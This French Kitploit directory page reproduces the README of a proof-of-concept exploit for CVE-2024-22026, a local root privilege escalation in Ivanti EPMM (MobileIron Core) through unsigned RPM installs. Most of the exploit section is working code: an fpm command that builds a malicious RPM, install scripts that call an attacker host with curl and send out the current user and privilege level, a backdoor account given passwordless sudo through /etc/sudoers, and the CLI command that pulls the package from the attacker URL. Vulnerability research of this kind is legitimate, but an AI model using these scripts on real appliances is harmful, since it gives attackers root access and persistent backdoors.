Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-22026 — Exploit POC pour CVE-2024-22026 affectant Ivanti EPMM « MobileIron Core » | Kitploit
Outils/GitHubGitHub/securekomodo/cve-2024-22026
Escalade de PrivilègesGénération de PayloadsAnalyse des VulnérabilitésExploitationArticles et RechercheApprentissage et Éducation
GitHubsecurekomodo/cve-2024-22026

CVE-2024-22026

Exploit POC pour CVE-2024-22026 affectant Ivanti EPMM « MobileIron Core »

Voir le dépôt
1543il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-22026

POC d'exploitation pour CVE-2024-22026 affectant Ivanti EPMM « MobileIron Core » image

CVE-2024-22026 est une vulnérabilité d'élévation de privilèges locale dans les versions du serveur Ivanti EPMM (anciennement MobileIron) antérieures à 12.1.0.0, 12.0.0.0 et 11.12.0.1. Cette vulnérabilité permet à un attaquant local d'obtenir un accès root au système en exploitant le processus de mise à jour logicielle avec un paquet RPM malveillant provenant d'une URL distante.

Lisez l'article de blog complet pour des informations techniques détaillées : Exploiting CVE-2024-22026: Rooting Ivanti EPMM (MobileIron Core)

Détails de la vulnérabilité

  • CVE ID : CVE-2024-22026
  • Gravité : Indéterminée
  • Vecteur d'attaque : Local
  • Impact : Permet à un attaquant local d'obtenir un accès root
  • Versions affectées : Versions du serveur Ivanti EPMM (anciennement MobileIron) antérieures à 12.1.0.0, 12.0.0.0 et 11.12.0.1
  • Disponibilité du correctif : Corrigé dans les versions 12.1.0.0, 12.0.0.0 et 11.12.0.1

Découverte

Lors de nos recherches, nous avons découvert que l'appliance utilise la commande suivante pour récupérer et installer des paquets RPM en tant qu'utilisateur à faibles privilèges :

root@kitploit:~
install rpm url <remote url>

Cette commande ci-dessus n'est qu'un wrapper CLI pour l'exécution suivante, qui s'exécute en tant que root :

root@kitploit:~
/bin/rpm -Uvh *.rpm

Cette commande rpm sous-jacente n'impose aucune vérification de signature ni filtrage d'URL, ce qui signifie que n'importe quel paquet RPM peut être installé. Cela permet à un attaquant de forger et de livrer un paquet RPM malveillant pouvant compromettre l'appliance.

POC d'exploitation

Création du RPM malveillant

La commande suivante est utilisée pour créer un paquet RPM malveillant :

root@kitploit:~
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .

Script de pré-installation (preinstall.sh)

root@kitploit:~
#!/bin/sh
curl -O http://<attacker_IP>/poc
exit 0

Script de post-installation (postinstall.sh)

root@kitploit:~
#!/bin/sh
set -e  # Enable strict error checking

# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)

curl http://<attacker_IP>/poc?user=$CURRENT_USER
curl http://<attacker_IP>/poc?priv=$PRIV_LEVEL

# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
  echo "Failed to add user 'exploit-poc'" >&2
  exit 1
fi

echo "exploit-poc:<redacted_password>" | chpasswd

# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
  echo "Failed to modify sudoers file" >&2
  exit 1
fi

exit 0

Exécution de la commande CLI pour récupérer le RPM

Pour exploiter la vulnérabilité, l'attaquant exécuterait la commande suivante dans le CLI pour récupérer et installer le RPM malveillant :

root@kitploit:~
install rpm url http://<attacker_IP>/ivanti-privesc-13.37-1.i386.rpm

Correction

Ivanti a publié des correctifs pour résoudre CVE-2024-22026 dans les versions suivantes :

  • 12.1.0.0
  • 12.0.0.0
  • 11.12.0.1

Avertissement

Ce dépôt et son contenu sont destinés uniquement à des fins éducatives et de recherche. L'utilisation des informations contenues ici se fait à vos propres risques.

Télécharger l’outil